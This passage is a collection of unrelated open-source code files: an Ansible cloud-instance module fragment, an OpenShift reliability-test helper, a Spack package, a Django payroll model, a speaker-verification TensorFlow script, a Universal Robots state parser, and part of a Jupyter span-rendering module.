params['regions'], inst_params, params['instance_count'])
module.exit_json(
changed=res.changed,
active=[r.__dict__ for r in res.active],
terminated=[r.__dict__ for r in res.terminated]
)
if __name__ == '__main__':
module_args = dict(
regions=dict(type='list', required=True),
project=dict(type='str', required=True),
namespace=dict(type='str', required=True),
group=dict(type='str', required=True),
add_tags=dict(type='dict', required=False, default=dict()),
key_name=dict(type='str', required=True),
security_group=dict(type='str', required=True),
instance_type=dict(type='str', required=True),
instance_count=dict(type='int', required=True),
market_spot=dict(type='bool', required=False, default=False),
spot_max_price=dict(type='str', required=False, default=None),
ebs_volume_size=dict(type='int', required=False, default=None),
ebs_volume_type=dict(type='str', required=False, default=None),
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
run(module)
|
reliability/tasks/Apps.py | RH-ematysek/svt | 115 | 29948 | from .GlobalData import global_data
from .utils.oc import oc
import requests
import time
import logging
class App:
def __init__(self, deployment, project, template, build_config,route=""):
self.project = project
self.template = template
self.deployment = deployment
self.build_config = build_config
self.route = route
self.logger = logging.getLogger('reliability')
def build(self, kubeconfig):
(result, rc) = oc("start-build -n " + self.project + " " + self.build_config, kubeconfig)
if rc != 0:
self.logger.error("build_app: Failed to create app " + self.deployment + " in project " + self.project)
return "App build failed for build config : " + self.build_config
else:
with global_data.builds_lock:
global_data.total_build_count += 1
return "App build succeeded for build config : " + self.build_config
def visit(self):
visit_success = False
try:
r = requests.get("http://" + self.route + "/")
self.logger.info(str(r.status_code) + ": visit: " + self.route)
if r.status_code == 200:
visit_success = True
except Exception as e :
self.logger.error(f"visit: {self.route} Exception {e}")
return visit_success
def scale_up(self, kubeconfig):
(result, rc) = oc("scale --replicas=2 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_up: Failed to scale up " + self.project + "." + self.deployment)
return "App scale up failed for deployment : " + self.deployment
else:
return "App scale up succeeded for deployment : " + self.deployment
def scale_down(self, kubeconfig):
(result, rc) = oc("scale --replicas=1 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_down: Failed to scale down " + self.project + "." + self.deployment)
return "App scale down failed for deployment : " + self.deployment
else:
return "App scale down succeeded for deployment : " + self.deployment
class Apps:
def __init__(self):
self.failed_apps = 0
self.apps = {}
self.logger = logging.getLogger('reliability')
def add(self, app, kubeconfig):
(result, rc) = oc("new-app -n " + app.project + " --template " + app.template, kubeconfig)
if rc != 0:
self.logger.error("create_app: Failed to create app " + app.deployment + " in project " + app.project)
return None
else:
self.apps[app.project + "." + app.deployment] = app
(route,rc) = oc("get route --no-headers -n " + app.project + " | awk {'print $2'} | grep " + app.template, kubeconfig)
if rc == 0:
app.route = route.rstrip()
max_tries = 60
current_tries = 0
visit_success = False
while not visit_success and current_tries <= max_tries:
self.logger.info(app.template + " route not available yet, sleeping 10 seconds")
time.sleep(10)
current_tries += 1
visit_success = app.visit()
if not visit_success:
self.failed_apps += 1
self.logger.error("add_app: " + app.project + "." + app.deployment + " did not become available" )
return app
# removing an app just removes the dictionary entry, actual app removed by project deletion
def remove(self,app):
self.apps.pop(app.project + "." + app.deployment)
def simulate(self):
apps = {}
app1 = App('cakephp-mysql-example','cakephp-mysql-example-0','cakephp-mysql-example','cakephp-mysql-example')
self.apps[app1.project + "." + app1.deployment] = app1
# app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example')
# self.apps[app2.project + "." + app2.deployment] = app2
def init(self):
pass
all_apps=Apps()
if __name__ == "__main__":
app = App("cakephp-mysql-example", "t1", "cakephp-mysql-example","cakephp-mysql-example")
apps = Apps()
# apps.add(app)
# time.sleep(180)
app.visit()
app.scale_up()
time.sleep(30)
app.scale_down()
app.build()
|
var/spack/repos/builtin/packages/liblzf/package.py | BenWibking/spack | 2,360 | 29971 | <gh_stars>1000+
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Liblzf(AutotoolsPackage):
"""LibLZF is a very small data compression library.
It consists of only two .c and two .h files and is very easy to incorporate into
your own programs. The compression algorithm is very, very fast, yet still written
in portable C."""
homepage = "http://oldhome.schmorp.de/marc/liblzf.html"
url = "http://dist.schmorp.de/liblzf/liblzf-3.6.tar.gz"
version('3.6', sha256='9c5de01f7b9ccae40c3f619d26a7abec9986c06c36d260c179cedd04b89fb46a')
|
apps/payroll/models/employee.py | youssriaboelseod/pyerp | 115 | 29979 | <filename>apps/payroll/models/employee.py
# Django Library
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from apps.base.models import PyFather
# Tabla de Empleados
class PyEmployee(PyFather):
name = models.CharField('Nombre', max_length=80)
name2 = models.CharField('<NAME>', max_length=80, blank=True)
first_name = models.CharField('Apellido Paterno', max_length=80, blank=True)
last_name = models.CharField('Apellido Materno', max_length=80, blank=True)
phone = models.CharField('Teléfono', max_length=20, blank=True)
email = models.CharField('Correo', max_length=40, blank=True)
def get_absolute_url(self):
return reverse('payroll:employee-detail', kwargs={'pk': self.pk})
def __str__(self):
return format(self.name)
|
model_zoo/jag_utils/python/build_inclusive_from_exclusive.py | jonesholger/lbann | 194 | 29991 | import sys
if len(sys.argv) != 4 :
print 'usage:', sys.argv[0], 'index_fn id_mapping_fn output_fn'
exit(9)
a = open(sys.argv[1])
a.readline()
header = a.readline()
dir = a.readline()
#build map: filename -> set of bad samples
mp = {}
mp_good = {}
mp_bad = {}
for line in a :
t = line.split()
mp[t[0]] = set()
mp_good[t[0]] = t[1]
mp_bad[t[0]] = t[2]
for id in t[3:] :
mp[t[0]].add(id)
a.close()
out = open(sys.argv[3], 'w')
out.write('CONDUIT_HDF5_INCLUSION\n')
out.write(header)
out.write(dir)
a = open(sys.argv[2])
bad = 0
for line in a :
t = line.split()
fn = t[0]
out.write(fn + ' ' + mp_good[fn] + ' ' + mp_bad[fn] + ' ')
for id in t[1:] :
if id not in mp[fn] :
out.write(id + ' ')
else :
bad += 1
out.write('\n')
out.close()
print header
print 'num found bad:', bad
|
model.py | ishine/Speaker_Verification | 337 | 29994 | import tensorflow as tf
import numpy as np
import os
import time
from utils import random_batch, normalize, similarity, loss_cal, optim
from configuration import get_config
from tensorflow.contrib import rnn
config = get_config()
def train(path):
tf.reset_default_graph() # reset graph
# draw graph
batch = tf.placeholder(shape= [None, config.N*config.M, 40], dtype=tf.float32) # input batch (time x batch x n_mel)
lr = tf.placeholder(dtype= tf.float32) # learning rate
global_step = tf.Variable(0, name='global_step', trainable=False)
w = tf.get_variable("w", initializer= np.array([10], dtype=np.float32))
b = tf.get_variable("b", initializer= np.array([-5], dtype=np.float32))
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # define lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last ouput is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# loss
sim_matrix = similarity(embedded, w, b)
print("similarity matrix size: ", sim_matrix.shape)
loss = loss_cal(sim_matrix, type=config.loss)
# optimizer operation
trainable_vars= tf.trainable_variables() # get variable list
optimizer= optim(lr) # get optimizer (type is determined by configuration)
grads, vars= zip(*optimizer.compute_gradients(loss)) # compute gradients of variables with respect to loss
grads_clip, _ = tf.clip_by_global_norm(grads, 3.0) # l2 norm clipping by 3
grads_rescale= [0.01*grad for grad in grads_clip[:2]] + grads_clip[2:] # smaller gradient scale for w, b
train_op= optimizer.apply_gradients(zip(grads_rescale, vars), global_step= global_step) # gradient update operation
# check variables memory
variable_count = np.sum(np.array([np.prod(np.array(v.get_shape().as_list())) for v in trainable_vars]))
print("total variables :", variable_count)
# record loss
loss_summary = tf.summary.scalar("loss", loss)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
# training session
with tf.Session() as sess:
tf.global_variables_initializer().run()
os.makedirs(os.path.join(path, "Check_Point"), exist_ok=True) # make folder to save model
os.makedirs(os.path.join(path, "logs"), exist_ok=True) # make folder to save log
writer = tf.summary.FileWriter(os.path.join(path, "logs"), sess.graph)
epoch = 0
lr_factor = 1 # lr decay factor ( 1/2 per 10000 iteration)
loss_acc = 0 # accumulated loss ( for running average of loss)
for iter in range(config.iteration):
# run forward and backward propagation and update parameters
_, loss_cur, summary = sess.run([train_op, loss, merged],
feed_dict={batch: random_batch(), lr: config.lr*lr_factor})
loss_acc += loss_cur # accumulated loss for each 100 iteration
if iter % 10 == 0:
writer.add_summary(summary, iter) # write at tensorboard
if (iter+1) % 100 == 0:
print("(iter : %d) loss: %.4f" % ((iter+1),loss_acc/100))
loss_acc = 0 # reset accumulated loss
if (iter+1) % 10000 == 0:
lr_factor /= 2 # lr decay
print("learning rate is decayed! current lr : ", config.lr*lr_factor)
if (iter+1) % 10000 == 0:
saver.save(sess, os.path.join(path, "./Check_Point/model.ckpt"), global_step=iter//10000)
print("model is saved!")
# Test Session
def test(path):
tf.reset_default_graph()
# draw graph
enroll = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # enrollment batch (time x batch x n_mel)
verif = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # verification batch (time x batch x n_mel)
batch = tf.concat([enroll, verif], axis=1)
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # make lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last ouput is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# enrollment embedded vectors (speaker model)
enroll_embed = normalize(tf.reduce_mean(tf.reshape(embedded[:config.N*config.M, :], shape= [config.N, config.M, -1]), axis=1))
# verification embedded vectors
verif_embed = embedded[config.N*config.M:, :]
similarity_matrix = similarity(embedded=verif_embed, w=1., b=0., center=enroll_embed)
saver = tf.train.Saver(var_list=tf.global_variables())
with tf.Session() as sess:
tf.global_variables_initializer().run()
# load model
print("model path :", path)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path, "Check_Point"))
ckpt_list = ckpt.all_model_checkpoint_paths
loaded = 0
for model in ckpt_list:
if config.model_num == int(model.split('-')[-1]): # find ckpt file which matches configuration model number
print("ckpt file is loaded !", model)
loaded = 1
saver.restore(sess, model) # restore variables from selected ckpt file
break
if loaded == 0:
raise AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")
print("test file path : ", config.test_path)
# return similarity matrix after enrollment and verification
time1 = time.time() # for check inference time
if config.tdsv:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False, noise_filenum=1),
verif:random_batch(shuffle=False, noise_filenum=2)})
else:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False),
verif:random_batch(shuffle=False, utter_start=config.M)})
S = S.reshape([config.N, config.M, -1])
time2 = time.time()
np.set_printoptions(precision=2)
print("inference time for %d utterences : %0.2fs"%(2*config.M*config.N, time2-time1))
print(S) # print similarity matrix
# calculating EER
diff = 1; EER=0; EER_thres = 0; EER_FAR=0; EER_FRR=0
# through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR)
for thres in [0.01*i+0.5 for i in range(50)]:
S_thres = S>thres
# False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker)
FAR = sum([np.sum(S_thres[i])-np.sum(S_thres[i,:,i]) for i in range(config.N)])/(config.N-1)/config.M/config.N
# False reject ratio = false reject / matched population (enroll speaker = verification speaker)
FRR = sum([config.M-np.sum(S_thres[i][:,i]) for i in range(config.N)])/config.M/config.N
# Save threshold when FAR = FRR (=EER)
if diff> abs(FAR-FRR):
diff = abs(FAR-FRR)
EER = (FAR+FRR)/2
EER_thres = thres
EER_FAR = FAR
EER_FRR = FRR
print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER,EER_thres,EER_FAR,EER_FRR))
|
ur_driver/src/ur_driver/deserializeRT.py | Hugal31/universal_robot | 749 | 30042 | from __future__ import print_function
import struct
import copy
#this class handles different protocol versions
class RobotStateRT(object):
@staticmethod
def unpack(buf):
rs = RobotStateRT()
(plen, ptype) = struct.unpack_from("!IB", buf)
if plen == 756:
return RobotStateRT_V15.unpack(buf)
elif plen == 812:
return RobotStateRT_V18.unpack(buf)
elif plen == 1044:
return RobotStateRT_V30.unpack(buf)
else:
print("RobotStateRT has wrong length: " + str(plen))
return rs
#this parses RobotStateRT for versions = v1.5
#http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd
class RobotStateRT_V15(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V15()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
###
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
return rs
#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8)
class RobotStateRT_V18(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V18()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_mode: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
return rs
#this parses RobotStateRT for versions >=3.0 (i.e. 3.0)
class RobotStateRT_V30(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'i_control',
'tool_vector_actual', 'tcp_speed_actual', 'tcp_force',
'tool_vector_target', 'tcp_speed_target',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes', 'safety_mode',
#6xd: unused
'tool_acc_values',
#6xd: unused
'speed_scaling', 'linear_momentum_norm',
#2xd: unused
'v_main', 'v_robot', 'i_robot', 'v_actual']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V30()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#i_control: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_control = copy.deepcopy(all_values)
#tool_vector_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_actual = copy.deepcopy(all_values)
#tcp_speed_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_actual = copy.deepcopy(all_values)
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_target = copy.deepcopy(all_values)
#tcp_speed_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_target = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_modes: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
#safety_mode: 1x double (1x 8byte)
rs.safety_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 6x double (6x 8byte)
offset+=48
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 6x double (6x 8byte)
offset+=48
#speed_scaling: 1x double (1x 8byte)
rs.speed_scaling = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#linear_momentum_norm: 1x double (1x 8byte)
rs.linear_momentum_norm = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 2x double (2x 8byte)
offset+=16
#v_main: 1x double (1x 8byte)
rs.v_main = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_robot: 1x double (1x 8byte)
rs.v_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#i_robot: 1x double (1x 8byte)
rs.i_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.v_actual = copy.deepcopy(all_values)
return rs
|
text_extensions_for_pandas/jupyter/span.py | ZachEichen/text-extensions-for-pandas | 193 | 30055 | #
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# span.py
#
# Part of text_extensions_for_pandas
#
# Support for span-centric Jupyter rendering and utilities
#
import textwrap
from typing import *
from enum import Enum
import text_extensions_for_pandas.resources
# TODO: This try/except block is for Python 3.6 support, and should be
# reduced to just importing importlib.resources when 3.6 support is dropped.
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
# Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items.
_DOCUMENT_DISPLAY_LIMIT = 100
class SetType(Enum):
NESTED=1
OVERLAP=2
class RegionType(Enum):
NESTED=1
COMPLEX=2
SOLO=3
def pretty_print_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
"""
HTML pretty-printing of a series of spans for Jupyter notebooks.
Args:
column: Span column (either character or token spans).
show_offsets: True to generate a table of span offsets in addition
to the marked-up text
"""
# Local import to prevent circular dependencies
from text_extensions_for_pandas.array.span import SpanArray
from text_extensions_for_pandas.array.token_span import TokenSpanArray
if not isinstance(column, (SpanArray, TokenSpanArray)):
raise TypeError(f"Expected SpanArray or TokenSpanArray, but received "
f"{column} of type {type(column)}")
# Gets the main script and stylesheet from the 'resources' sub-package
style_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.css")
script_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.js")
# Declare initial variables common to all render calls
instance_init_script_list: List[str] = []
# For each document, pass the array of spans and document text into the script's render function
document_columns = column.split_by_document()
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(document_columns))):
# Get a javascript representation of the column
span_array = []
token_span_array = []
for e in document_columns[column_index]:
span_array.append(f"""[{e.begin},{e.end}]""")
if hasattr(e, "tokens"):
token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")
document_object_script = f"""
const doc_spans = [{','.join(span_array)}]
const doc_text = '{_get_escaped_doctext(document_columns[column_index])}'
"""
# If the documents are a TokenSpanArray, include the start and end token indices in the document object.
if len(token_span_array) > 0:
document_object_script += f"""
const doc_token_spans = [{','.join(token_span_array)}]
documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}})
"""
else:
document_object_script += """
documents.push({doc_text: doc_text, doc_spans: doc_spans})
"""
instance_init_script_list.append(f"""
{{
{document_object_script}
}}
""")
# Defines a list of DOM strings to be appended to the end of the returned HTML.
postfix_tags: List[str] = []
if len(document_columns) > _DOCUMENT_DISPLAY_LIMIT:
postfix_tags.append(f"""
<footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer>
""")
# Get the show_offsets parameter as a JavaScript boolean
show_offset_string = 'true' if show_offsets else 'false'
return textwrap.dedent(f"""
<style class="span-array-css">
{textwrap.indent(style_text, ' ')}
</style>
<script>
{{
{textwrap.indent(script_text, ' ')}
}}
</script>
<div class="span-array">
{_get_initial_static_html(column, show_offsets)}
<span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span>
</div>
<script>
{{
const Span = window.SpanArray.Span
const script_context = document.currentScript
const documents = []
{''.join(instance_init_script_list)}
const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context)
instance.render()
}}
</script>
{''.join(postfix_tags)}
""")
def _get_escaped_doctext(column: Union["SpanArray", "TokenSpanArray"]) -> List[str]:
# Subroutine of pretty_print_html() above.
# Should only be called for single-document span arrays.
if not column.is_single_document:
raise ValueError("Array contains spans from multiple documents. Can only "
"render one document at a time.")
text = column.document_text
text_pieces = []
for i in range(len(text)):
if text[i] == "'":
text_pieces.append("\\'")
elif text[i] == "\n":
text_pieces.append("\\n")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
def _get_initial_static_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
# Subroutine of pretty_print_html above.
# Gets the initial static html representation of the column for notebook viewers without JavaScript support.
# Iterates over each document and constructs the DOM string with template literals.
# ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation
# and XSS attacks.
documents = column.split_by_document()
documents_html = []
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(documents))):
document = documents[column_index]
# Generate a dictionary to store span information, including relationships with spans occupying the same region.
spans = {}
is_token_document = False
sorted_span_ids = []
for i in range(len(document)):
span_data = {}
